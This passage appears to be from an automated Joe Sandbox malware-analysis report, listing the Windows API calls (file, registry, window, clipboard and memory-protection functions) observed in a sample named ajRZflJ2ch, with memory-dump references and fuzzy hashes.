                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                            • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                            • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                            APIs
                                                                                                            • EnumWindows.USER32(00000000), ref: 70132B6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnumWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 1129996299-0
                                                                                                            • Opcode ID: 430d012b3ff71955d8860baee64414750ef2902258c88e91bc82f612225f9d8e
                                                                                                            • Instruction ID: a6d2ec3592266cb1cadc04f1fc861951a676ff65cd5ab736b18850b37650bbca
                                                                                                            • Opcode Fuzzy Hash: 430d012b3ff71955d8860baee64414750ef2902258c88e91bc82f612225f9d8e
                                                                                                            • Instruction Fuzzy Hash: F241D3B2804204EFDB25FF65DD92B4DFB74FB14768FB048AAF505D7910D63AA8848B90
                                                                                                            APIs
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileMove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3562171763-0
                                                                                                            • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                            • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                            • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F34D,0040CED0,004033DE,0040CED0,0040F34D,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(7013505C,00000004,00000040,7013504C), ref: 701329B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: d3165fbbec0d006079734de93e1d6276bfd3f71314a7d53f31b720ff25224e22
                                                                                                            • Instruction ID: 83932c6f33cca6c4db4cd0114fbe8f06f28e872d0e7c7a9ba86beb3ad326c533
                                                                                                            • Opcode Fuzzy Hash: d3165fbbec0d006079734de93e1d6276bfd3f71314a7d53f31b720ff25224e22
                                                                                                            • Instruction Fuzzy Hash: 43F0A5B2608280DEC358CF2A8CA4709FFE0B708B18F70496AF188D6A60E3764448CF95
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                            • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,7013123B,?,701312DF,00000019,701311BE,-000000A0), ref: 70131225
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: 4f9b44644f616106725d7f58921a95b161787b0feda8899ca46587a4614aa13f
                                                                                                            • Instruction ID: 06583eb1bac62918fb180ded35b145a01e0bc4a75295051c5f7443149412d418
                                                                                                            • Opcode Fuzzy Hash: 4f9b44644f616106725d7f58921a95b161787b0feda8899ca46587a4614aa13f
                                                                                                            • Instruction Fuzzy Hash: CBB01272B00000DFEF048B65CC06F347654E700701F244010F700C0590C16158008534
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
